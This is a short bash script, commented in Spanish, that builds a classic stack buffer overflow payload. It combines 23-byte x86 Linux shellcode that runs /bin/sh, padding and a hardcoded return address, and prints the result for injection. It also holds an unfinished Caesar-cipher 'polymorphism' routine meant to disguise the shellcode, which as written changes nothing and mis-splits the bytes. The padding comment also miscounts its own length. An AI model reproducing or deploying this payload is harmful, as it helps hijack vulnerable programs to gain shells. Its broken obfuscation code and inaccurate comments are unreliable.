#!/bin/bash
# cadena de opcodes para establecer shell interactiva posterior a smash stacking

# 23 bytes
shellcodea='\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'

# 4 bytes
shellcodeb='\x1b\xf3\xff\xbf'

# 20 bytes
offset='AAAAAAAAAAAAAAAAAAAAA'

  shellcode() {
    echo -e $shellcodea$offset$shellcodeb
}

# aplica cifrado cesar con n dezplazamientos, y se agrega decifrador para tiempo de ejecucion (este ejemplo no es polimorfismo puro... aun)
    polimorphism() {
  # read -p "Cifrar opcode con (n) dezplazamientos: " ENCRYPT
  echo $shellcodea | tr '\\x' '\n' | grep -E '.+' | while read hexe
  do
  CIFRADO=$(echo "$hexe") # adicion de n a cada opcode
  echo -n "\x$CIFRADO"
  done
}

shellcode